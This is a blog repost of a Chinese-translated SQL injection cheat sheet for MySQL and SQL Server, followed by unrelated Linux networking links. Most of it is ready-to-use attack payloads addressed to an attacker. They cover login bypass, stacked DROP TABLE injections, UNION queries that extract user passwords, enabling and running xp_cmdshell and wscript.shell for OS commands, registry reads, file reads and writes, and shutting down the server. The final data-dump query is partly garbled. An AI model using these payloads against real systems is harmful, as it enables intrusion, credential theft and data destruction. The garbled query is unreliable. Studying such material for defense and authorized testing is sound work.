SQL注入速查表(sql注入怎么排查)
sinye56 2024-09-22 08:24 5 浏览 0 评论
0x00 关于SQL注入速查表
现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句,而经常发生变化。
样例仅用于读者理解对于“可能出现的攻击(a potential attack)”的基础概念,并且几乎每一个部分都有一段简洁的概要
- M: MySQL
- S: SQL Server
- P: PostgreSQL
- O: Oracle
- +: (大概)其他所有数据库
例子:
- (MS) 代表 : MySQL 和 SQL Server 等
- (M*S) 代表 : 仅对某些版本或者某些附在后文中的特殊情况的 MySQL,以及SQL Server
0x01 目录
- 关于SQL注入速查表
- 语法参考,攻击样例以及注入小技巧
- 获取用户定义表
- 获取字段名
- @@version(MS)
- 文件插入(Bulk Insert)(S)
- BCP(S)
- SQL Server的VBS/WSH(S)
- 执行系统命令,xp_cmdshell(S)
- SQL Server中的一些特殊的表(S)
- SQL Server的其它内置程序(S)
- 大量MSSQL笔记
- 使用LIMIT(M)或ORDER(MSO)的注入
- 关掉SQL Server(S)
- 获取字段类型
- 使用HAVING来探测字段名(S)
- 在SELECT查询中使用ORDER BY探测字段数(MSO+)
- 绕过MD5哈希检查的例子(MSP)
- UNION-语言问题处理
- 使用了16进制的注入攻击样例
- 字符串的串联
- MySQL的If语句
- SQL Server的If语句
- 使用了If语句的注入攻击样例
- 支持堆叠查询的语言/数据库
- 关于MySQL和PHP
- 堆叠注入攻击样例
- 使用了行内注释的注入攻击样例
- MySQL版本探测攻击样例
- 使用了行间注释的SQL注入攻击样例
- 行间注释
- 行内注释
- 堆叠查询(Stacking Queries)
- If语句
- 整数(Integers)的使用
- 字符串操作
- 没有引号的字符串
- 字符串异化(Modification)与联系
- Union注入
- 绕过登陆界面(SMO+)
- 绕过检查MD5哈希的登陆界面
- 基于错误(Error Based)-探测字段名
- 数据类型、UNION、之类的
- 简单的注入(MSO+)
- 有用的函数、信息收集、内置程序、大量注入笔记
- 在SQL Server 2005中启用xp_cmdshell
- 探测SQL Server数据库的结构(S)
- 移动记录(Moving records)(S)
- 快速的脱掉基于错误(Error Based)的SQL Server注入(S)
0x02 语法参考,攻击样例以及注入小技巧
行间注释
注释掉查询语句的其余部分
行间注释通常用于注释掉查询语句的其余部分,这样你就不需要去修复整句语法了。
- --(SM)DROP sampletable;--
- #(M)DROP sampletable;#
使用了行间注释的SQL注入攻击样例
用户名:admin'--
- 构成语句:SELECT * FROM members WHERE username = 'admin'--' AND password = 'password' 这会使你以admin身份登陆,因为其余部分的SQL语句被注释掉了。
行内注释
通过不关闭注释注释掉查询语句的其余部分,或者用于绕过过滤,移除空格,混淆,或探测数据库版本。
- /*注释内容*/(SM)
- DROP/*comment*/sampletable
- DR/**/OP/*绕过过滤*/sampletable
- SELECT/*替换空格*/password/**/FROM/**/Members
- /*! MYSQL专属 */ (M)这是个MySQL专属语法。非常适合用于探测MySQL版本。如果你在注释中写入代码,只有MySQL才会执行。同样的你也可以用这招,使得只有高于某版本的服务器才执行某些代码。 SELECT /*!32302 1/0, */ 1 FROM tablename
使用了行内注释的注入攻击样例
ID:10; DROP TABLE members /*
简单地摆脱了处理后续语句的麻烦,同样你可以使用10; DROP TABLE members --
MySQL版本探测攻击样例
SELECT /*!32302 1/0, */ 1 FROM tablename
如果MySQL的版本高于3.23.02,会抛出一个division by 0 error
ID:/*!32302 10*/
ID:10
如果MySQL版本高于3.23.02,以上两次查询你将得到相同的结果
堆叠查询(Stacking Queries)
一句代码之中执行多个查询语句,这在每一个注入点都非常有用,尤其是使用SQL Server后端的应用
- ;(S) SELECT * FROM members; DROP members-- 结束一个查询并开始一个新的查询
支持堆叠查询的语言/数据库
绿色:支持,暗灰色:不支持,浅灰色:未知
关于MySQL和PHP
阐明一些问题。
PHP-MySQL不支持堆叠查询,Java不支持堆叠查询(ORACLE的我很清楚,其他的就不确定了)。一般来说MySQL支持堆叠查询,但由于大多数PHP-Mysql应用框架的数据库层都不能执行第二条查询,或许MySQL的客户端支持这个,我不确定,有人能确认一下吗?
(译者注:MySQL 5.6.20版本下客户端支持堆叠查询)
堆叠注入攻击样例
ID:10;DROP members --
构成语句:SELECT * FROM products WHERE id = 10; DROP members--
这在执行完正常查询之后将会执行DROP查询。
If语句
根据If语句得到响应。这是盲注(Blind SQL Injection)的关键之一,同样也能简单而准确地进行一些测试。
MySQL的If语句
- IF(condition,true-part,false-part)(M)SELECT IF (1=1,'true','false')
SQL Server的If语句
- IF condition true-part ELSE false-part(S)IF (1=1) SELECT 'true' ELSE SELECT 'false'
使用了If语句的注入攻击样例
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0(S)
如果当前用户不是"sa"或者"dbo",就会抛出一个divide by zero error。
整数(Integers)的使用
对于绕过十分有用,比如magic_quotes() 和其他类似过滤器,甚至是各种WAF。
- 0xHEXNUMBER(SM)(HEXNUMBER:16进制数) 你能这样使用16进制数:
- SELECT CHAR(0x66)(S)
- SELECT 0x5045(M) (这不是一个整数,而会是一个16进制字符串)
- SELECT 0x50 + 0x45(M) (现在这是整数了)
字符串操作
与字符串相关的操作。这对于构造一个不含有引号,用于绕过或探测数据库都非常的有用。
字符串的串联
- +(S)SELECT login + '-' + password FROM members
- || (*MO)SELECT login || '-' || password FROM members
*关于MySQL的"||" 这个仅在ANSI模式下的MySQL执行,其他情况下都会当成'逻辑操作符'并返回一个0。更好的做法是使用CONCAT()函数。
- CONCAT(str1, str2, str3, ...)(M)连接参数里的所有字符串 例:SELECT CONCAT(login, password) FROM members
没有引号的字符串
有很多使用字符串的方法,但是这几个方法是一直可用的。使用CHAR()(MS)和CONCAT()(M)来生成没有引号的字符串
- 0x457578 (M) - 16进制编码的字符串SELECT 0x457578这在MySQL中会被当做字符串处理
- 在MySQL中使用16进制字符串的一个简单方式: SELECT CONCAT('0x',HEX('c:\\boot.ini'))
- 在MySQL中使用CONCAT()函数: SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)这会返回'KLM'
- SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)这会返回'KLM'
使用了16进制的注入攻击样例
- SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)这会显示c:\boot.ini的内容
字符串异化(Modification)与联系
- ASCII() (SMP)返回最左边字符的ASCII码的值。这是一个用于盲注的重要函数。例:SELECT ASCII('a')
- CHAR() (SM)把整数转换为对应ASCII码的字符例:SELECT CHAR(64)
Union注入
通过union你能跨表执行查询。最简单的,你能注入一个查询使得它返回另一个表的内容。 SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
这会把news表和members表的内容合并返回。
另一个例子: ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
UNION-语言问题处理
当你使用Union来注入的时候,经常会遇到一些错误,这是由于不同的语言的设置(表的设置、字段设置、表或数据库的设置等等)。这些办法对于解决那些问题都挺有用的,尤其是当你处理日文,俄文,土耳其文的时候你会就会见到他们的。
- 使用 COLLATE SQL_Latin1_General_Cp1254_CS_AS(S)或者其它的什么语句,具体的自己去查SQL Server的文档。例:SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
- Hex()(M)百试百灵~
绕过登陆界面(SMO+)
SQL注入101式(大概是原文名字吧?),登陆小技巧
- admin' --
- admin' #
- admin'/*
- ' or 1=1--
- ' or 1=1#
- ' or 1=1/*
- ') or '1'='1--
- ') or ('1'='1--
- ....
- 以不同的用户登陆 (SM*) ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
**旧版本的MySQL不支持union*
绕过检查MD5哈希的登陆界面
如果应用是先通过用户名,读取密码的MD5,然后和你提供的密码的MD5进行比较,那么你就需要一些额外的技巧才能绕过验证。你可以把一个已知明文的MD5哈希和它的明文一起提交,使得程序不使用从数据库中读取的哈希,而使用你提供的哈希进行比较。
绕过MD5哈希检查的例子(MSP)
用户名:admin
密码:1234 ' AND 1=0 UNION ALL SELECT 'admin','81dc9bdb52d04dc20036dbd8313ed055
其中81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
基于错误(Error Based)-探测字段名
使用HAVING来探测字段名(S)
- ' HAVING 1=1 --
- ' GROUP BY table.columnfromerror1 HAVING 1=1 --
- ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
- ……
- ' GROUP BY table.columnfromerror1, columnfromerror2,columnfromerror(n) HAVING 1=1 --
- 直到它不再报错,就算搞定了
在SELECT查询中使用ORDER BY探测字段数(MSO+)
通过ORDER BY来探测字段数能够加快union注入的速度。
- ORDER BY 1--
- ORDER BY 2--
- ……
- ORDER BY N--
- 一直到它报错为止,最后一个成功的数字就是字段数。
数据类型、UNION、之类的
提示:
- 经常给UNION配上ALL使用,因为经常会有相同数值的字段,而缺省情况下UNION都会尝试返回唯一值(records with distinct)
- 如果你每次查询只能有一条记录,而你不想让原本正常查询的记录占用这宝贵的记录位,你可以使用-1或者根本不存在的值来搞定原查询(前提是注入点在WHERE里)。
- 在UNION中使用NULL,对于大部分数据类型来说这样都比瞎猜字符串、日期、数字之类的来得强
- 盲注的时候要小心判断错误是来自应用的还是来自数据库的。因为像ASP.NET就经常会在你使用NULL的时候抛出错误(因为开发者们一般都没想到用户名的框中会出现NULL)
获取字段类型
- ' union select sum(columntofind) from users-- (S)Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a **varchar** data type as an argument. 如果没有返回错误说明字段是数字类型
- 同样的,你可以使用CAST()和CONVERT()
- SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--
- 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-没报错 - 语法是正确的。这是MS SQL Server的语法。继续。
- 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-没报错 – 第一个字段是integer类型。
- 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --报错 – 第二个字段不是integer类型
- 11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-没报错 – 第二个字段是string类型。
- 11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-报错 – 第三个字段不是integer
- ……Microsoft OLE DB Provider for SQL Server error '80040e07' Explicit conversion from data type int to image is not allowed.
你在遇到union错误之前会先遇到convert()错误,所以先使用convert()再用union
简单的注入(MSO+)
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
有用的函数、信息收集、内置程序、大量注入笔记
@@version(MS)
数据库的版本。这是个常量,你能把它当做字段来SELECT,而且不需要提供表名。同样的你也可以用在INSERT/UPDATE语句里面,甚至是函数里面。
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
文件插入(Bulk Insert)(S)
把文件内容插入到表中。如果你不知道应用目录你可以去读取IIS metabase file(仅IIS 6)(%systemroot%\system32\inetsrv\MetaBase.xml)然后在里面找到应用目录。
- 新建一个表foo(line varchar(8000))
- BULK INSERT foo FROM 'c:\inetpub\wwwroot\login.asp'
- DROP了临时表,重复另一个文件
BCP(S)
写入文件。这个功能需要登录 bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
SQL Server的VBS/WSH(S)
由于ActiveX的支持,你能在SQL Server中使用VBS/WSH
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
执行系统命令,xp_cmdshell(S)
众所周知的技巧,SQL Server 2005默认是关闭的。你需要admin权限
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
用ping简单的测试一下,用之前先检查一下防火墙和嗅探器。
EXEC master.dbo.xp_cmdshell 'ping '
如果有错误,或者union或者其他的什么,你都不能直接读到结果。
SQL Server中的一些特殊的表(S)
- Error Messagesmaster..sysmessages
- Linked Serversmaster..sysservers
- Password (2000和2005版本的都能被破解,这俩的加密算法很相似)SQL Server 2000: masters..sysxloginsSQL Server 2005 : sys.sql_logins
SQL Server的其它内置程序(S)
- 命令执行 (xp_cmdshell)exec master..xp_cmdshell 'dir'
- 注册表操作 (xp_regread)
- xp_regaddmultistring
- xp_regdeletekey
- xp_regdeletevalue
- xp_regenumkeys
- xp_regenumvalues
- xp_regread
- xp_regremovemultistring
- xp_regwriteexec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet \Services\lanmanserver\parameters', 'nullsessionshares' exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM \CurrentControlSet \Services\snmp\parameters\validcommunities'
- 管理服务(xp_servicecontrol)
- 媒体(xp_availablemedia)
- ODBC 资源 (xp_enumdsn)
- 登录 (xp_loginconfig)
- 创建Cab文件 (xp_makecab)
- 域名列举 (xp_ntsec_enumdomains)
- 杀进程 (need PID) (xp_terminate_process)
- 新建进程 (实际上你想干嘛都行)sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’ exec xp_webserver
- 写文件进UNC或者内部路径 (sp_makewebtask)
大量MSSQL笔记
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME() IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
你不能在 SQL Server 的Insert查询里使用子查询(sub select).
使用LIMIT(M)或ORDER(MSO)的注入
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
如果注入点在LIMIT的第二个参数处,你可以把它注释掉或者使用union注入。
关掉SQL Server(S)
如果你真的急了眼,';shutdown --
在SQL Server 2005中启用xp_cmdshell
默认情况下,SQL Server 2005中像xp_cmdshell以及其它危险的内置程序都是被禁用的。如果你有admin权限,你就可以启动它们。
`\ EXEC sp_configure 'show advanced options',1 RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE `\
探测SQL Server数据库的结构(S)
获取用户定义表
SELECT name FROM sysobjects WHERE xtype = 'U'
获取字段名
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
移动记录(Moving records)(S)
- 修改WHERE,使用NOT IN或者NOT EXIST ... WHERE users NOT IN ('First User', 'Second User') SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- 这个好用
- 脏的不行的小技巧SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as intSelect p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21
快速的脱掉基于错误(Error Based)的SQL Server注入(S)
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @[email protected]+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
相关推荐
- RHEL8和CentOS8怎么重启网络
-
本文主要讲解如何重启RHEL8或者CentOS8网络以及如何解决RHEL8和CentOS8系统的网络管理服务报错,当我们安装好RHEL8或者CentOS8,重启启动网络时,会出现以下报错:...
- Linux 内、外网双网卡路由配置
-
1.路由信息的影响Linux系统中如果有多张网卡的情况下,如果路由信息配置不正确,...
- Linux——centos7修改网卡名
-
修改网卡名这个操作可能平时用不太上,可作为了解。修改网卡默认名从ens33改成eth01.首先修改网卡配置文件名(建议将原配置文件进行备份)...
- CentOS7下修改网卡名称为ethX的操作方法
-
?Linux操作系统的网卡设备的传统命名方式是eth0、eth1、eth2等,而CentOS7提供了不同的命名规则,默认是基于固件、拓扑、位置信息来分配。这样做的优点是命名全自动的、可预知的...
- Linux 网卡名称enss33修改为eth0
-
一、CentOS修改/etc/sysconfig/grub文件(修改前先备份)为GRUB_CMDLINE_LINUX变量增加2个参数(net.ifnames=0biosdevname=0),修改完成...
- CentOS下双网卡绑定,实现带宽飞速
-
方式一1.新建/etc/sysconfig/network-scripts/ifcfg-bond0文件DEVICE=bond0IPADDR=191.3.60.1NETMASK=255.255.2...
- linux 双网卡双网段设置路由转发
-
背景网络情况linux双网卡:网卡A(ens3)和网卡B(...
- Linux-VMware设置网卡保持激活
-
Linux系统只有在激活网卡的状态下才能去连接网络,进行网络通讯。修改配置文件(永久激活网卡)...
- VMware虚拟机三种网络模式
-
01.VMware虚拟机三种网络模式由于linux目前很热门,越来越多的人在学习linux,但是买一台服务放家里来学习,实在是很浪费。那么如何解决这个问题?虚拟机软件是很好的选择,常用的虚拟机软件有v...
- 2023年最新版 linux克隆虚拟机 解决网卡uuid重复问题
-
问题描述1、克隆了虚拟机,两台虚拟机里面的ip以及网卡的uuid都是一样的2、ip好改,但是uuid如何改呢?解决问题1、每台主机应该保证网卡的UUID是唯一的,避免后面网络通信有问题...
- Linux网卡的Vlan配置,你可能不了解的玩法
-
如果服务器上连的交换机端口已经预先设置了TRUNK,并允许特定的VLAN可以通过,那么服务器的网卡在配置时就必须指定所属的VLAN,否则就不通了,这种情形在虚拟化部署时较常见。例如在一个办公环境中,办...
- Centos7 网卡绑定
-
1、切换到指定目录#备份网卡数据cd/etc/sysconfig/network-scriptscpifcfg-enp5s0f0ifcfg-enp5s0f0.bak...
- Linux搭建nginx+keepalived 高可用(主备+双主模式)
-
一:keepalived简介反向代理及负载均衡参考:...
- Linux下Route 路由指令使用详解
-
linuxroute命令用于显示和操作IP路由表。要实现两个不同子网之间的通信,需要一台连接两个网络的路由器,或者同时位于两个网络的网关来实现。在Linux系统中,设置路由通常是为了解决以下问题:该...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- oracle忘记用户名密码 (59)
- oracle11gr2安装教程 (55)
- mybatis调用oracle存储过程 (67)
- oracle spool的用法 (57)
- oracle asm 磁盘管理 (67)
- 前端 设计模式 (64)
- 前端面试vue (56)
- linux格式化 (55)
- linux图形界面 (62)
- linux文件压缩 (75)
- Linux设置权限 (53)
- linux服务器配置 (62)
- mysql安装linux (71)
- linux启动命令 (59)
- 查看linux磁盘 (72)
- linux用户组 (74)
- linux多线程 (70)
- linux设备驱动 (53)
- linux自启动 (59)
- linux网络命令 (55)
- linux传文件 (60)
- linux打包文件 (58)
- linux查看数据库 (61)
- linux获取ip (64)
- linux进程通信 (63)